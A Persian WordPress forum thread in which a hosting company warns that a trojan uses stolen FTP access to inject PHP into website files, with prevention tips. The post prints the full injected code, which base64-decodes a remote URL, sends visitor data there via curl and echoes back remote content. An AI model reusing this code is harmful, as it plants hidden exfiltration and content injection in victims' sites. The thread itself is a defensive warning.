انجمن

انجمن وردپرس فارسی » دیگر


کشف ویروس تروجان بسیار قوی  (۲ نوشته)

  • parsmizban

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳
    تشکر شده: ۱ بار
    # نوشته شده: ۱۲ سال پیش
    ۹ آبان ۱۳۹۱ - ۱۶:۱۹

    ویروس تروجان بسیار قوی به تازگی در حال آلوده کردن بسیاری از وب سایت ها می باشد.
    این ویروس که توسط پرسنل پارس میزبان شناسایی و رد یابی کامل شد ، توسط دستیابی به FTP یک سایت از روی کامپیوتر آلوده ، شروع به آلوده کردن هوشمندانه کد های یک وب سایت می کند.
    این ویروس با ویرایش فایل های متداول یک هاست از جمله سایت های Joomla ، WordPress ، Mambo و غیره کد خاصی را درج کرده و شروع به ارسال اطلاعات از این سایت ها می کند و پهنای باند وب سایت را مصرف می کند.

    نمونه فایل های آلوده شده بر روی یک هاست :

    همانطور که ملاحظه می کنید این دستیابی از طریق IP ی در آمریکا در دیتا سنتر SoftLayer انجام شده است. (http://whois.domaintools.com/173.192.88.18)
    بر اساس گزارش ما ارتباط با FTP ممکن است از IP های مختلفی ایجاد شود.

    این ویروس ، قطعه کد زیر را در فایل های نام برده قرار می دهد:

    <?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = “”;
if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( ‘aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==’).’?ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER['HTTP_HOST']).’&fullpath=’.urlencode($_SERVER['REQUEST_URI']).’&check=’.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==”O”)
{$sResult[0]=” “;
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

    این کد اطلاعات بازدید سایت را برای آدرسی که در قسمت base64_decode به صورت Encode شده ، ذکر شده ارسال می کند. http://browserglobalstat.com/statD/stat.php
    چگونه از این ویروس در امان باشیم ؟

    - استفاده از آنتی ویروس آپدیت شده (هر چند تا به حال هیچ آنتی ویروسی این ویروس را شناسایی نکرده ! در حال گزارش هستیم !)
    - عدم استفاده از نرم افزار های FTP غیر معتبر ، تا حد امکان عدم استفاده از FTP و استفاده از File Manager های موجود بر روی کنترل پنل هاست و آپلود دسته ای توسط ZIP
    - استفاده از کلمات عبور پیچیده
    - نگهداری مناسب از حساب کاربری ایمیل و تغییر کلمه عبور ایمیل

    لطفا جهت جلوگیری از پخش این ویروس به دوستان خود نیز اطلاع دهید!

    متن کامل : http://parsmizban.com/trojan-virus.html

  • omidh

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱
    # نوشته شده: ۱۲ سال پیش
    ۱۰ آبان ۱۳۹۱ - ۰۰:۲۴

    جالبه

درباره‌ی این موضوع



برچسب‌ها